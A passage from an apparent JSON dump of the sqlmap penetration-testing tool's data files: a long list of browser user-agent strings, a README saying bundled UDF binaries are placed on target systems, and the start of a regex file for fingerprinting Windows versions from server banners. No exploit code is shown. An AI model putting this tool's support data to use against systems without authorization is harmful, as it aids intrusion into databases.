(KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.12.9 (KHTML, like Gecko) Version/3.0 Safari/523.12.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/525+ (KHTML, like Gecko) Version/3.0 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; th) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/528+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/528+ (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8\nMozilla/5.0 (Windows; U; Windows NT 5.2; nl) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; pt) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 5.2; ru-RU) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; zh) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; cs) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; da-DK) AppleWebKit/523.12.9 (KHTML, like Gecko) Version/3.0 Safari/523.12.9\nMozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525+ (KHTML, like Gecko) Version/3.0.4 Safari/523.11\nMozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-gb) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Windows; U; Windows NT 6.0; es-es) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; fi) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr-ch) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528+ (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; nl) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; nl) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE) AppleWebKit/523.13 (KHTML, like Gecko) Version/3.0 Safari/523.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; tr-TR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; fr-FR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN) AppleWebKit/533+ (KHTML, like Gecko)\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+\nMozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+\n\n# https://techblog.willshouse.com/2012/01/03/most-common-user-agents/ (Note: Updated December 28th 2020)\n\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15\nMozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\nMozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15\nMozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66\nMozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400\nMozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.55\nMozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0\nMozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\nMozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.320\nMozilla/5.0 (X11; Fedora; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\nMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0\nMozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0\nMozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0\nMozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nMozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\nMozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284\n"
  },
  {
    "path": "sqlmap/data/udf/README.txt",
    "content": "Binary files in this folder are data files used by sqlmap on the target\nsystem, but not executed on the system running sqlmap. They are licensed\nunder the terms of the GNU Lesser General Public License and their source\ncode is available on https://github.com/sqlmapproject/udfhack.\n"
  },
  {
    "path": "sqlmap/data/xml/banner/generic.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <!-- Windows -->\n\n    <regexp value=\"(Microsoft|Windows|Win32)\">\n        <info type=\"Windows\"/>\n    </regexp>\n\n    <regexp value=\"Service Pack 0\">\n        <info sp=\"0\"/>\n    </regexp>\n\n    <regexp value=\"Service Pack 1\">\n        <info sp=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Service Pack 2\">\n        <info sp=\"2\"/>\n    </regexp>\n\n    <regexp value=\"Service Pack 3\">\n        <info sp=\"3\"/>\n    </regexp>\n\n    <regexp value=\"Service Pack 4\">\n        <info sp=\"4\"/>\n    </regexp>\n\n    <regexp value=\"Service Pack 5\">\n        <info sp=\"5\"/>\n    </regexp>\n\n    <!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->\n\n    <regexp value=\"Windows.*\\b10\\.0\">\n        <info type=\"Windows\" distrib=\"2016|2019|10|11\"/>\n   